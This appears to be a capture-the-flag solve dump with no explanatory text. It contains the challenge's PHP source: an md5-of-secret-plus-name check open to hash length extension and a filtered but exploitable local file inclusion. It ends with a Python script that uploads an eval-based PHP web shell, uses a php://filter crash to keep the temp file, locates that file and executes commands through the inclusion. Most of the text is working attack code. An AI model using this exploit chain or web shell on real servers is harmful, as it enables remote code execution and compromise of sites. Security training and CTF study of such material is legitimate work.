Set-Cookie: Hash=fa25e54758d5d5c1927781a6ede89f8a; expires=Fri, 25-Feb-2022 05:50:05 GMT; Max-Age=3600000
<?php
include 'config.php';
@$name=$_GET['name'];
@$pass=$_GET['pass'];
if(md5($secret.$name)===$pass){
echo '<script language="javascript" type="text/javascript">
window.location.href="flflflflag.php";
</script>
';
}else{
setcookie("Hash",md5($secret.$name),time()+3600000);
echo "username/password error";
}
?>
<html>
<!--md5($secret.$name)===$pass -->
</html>
<html>
<head>
<script language="javascript" type="text/javascript">
window.location.href="404.html";
</script>
<title>this_is_not_fl4g_and_出题人_wants_girlfriend</title>
</head>
<>
<body>
<?php
$file=$_GET['file'];
if(preg_match('/data|input|zip/is',$file)){
die('nonono');
}
@include($file);
echo 'include($_GET["file"])';
?>
</body>
</html>
<?php
var_dump(scandir('/tmp'));
?>
import requests
from io import BytesIO
import re
files = {
'file': BytesIO(b'<?php eval($_POST["cmd"]);?>')
}
url1 = 'http://59a657ea-09e5-49b8-a6db-c271b6157877.node4.buuoj.cn:81/flflflflag.php?file=php://filter/string.strip_tags/resource=index.php'
r = requests.post(url=url1, files=files, allow_redirects=False)
url2 = 'http://59a657ea-09e5-49b8-a6db-c271b6157877.node4.buuoj.cn:81/flflflflag.php?file=dir.php'
r = requests.get(url2,allow_redirects=False)
data = re.search(r"php[a-zA-Z0-9]{1,}", r.content.decode()).group(0)
print("++++++++++++++++++++++")
print(data)
print("++++++++++++++++++++++")
url3='http://59a657ea-09e5-49b8-a6db-c271b6157877.node4.buuoj.cn:81/flflflflag.php?file=/tmp/'+data
data = { 'cmd':"phpinfo();" }
r = requests.post(url=url3,data=data,allow_redirects=False)
print(r.content)
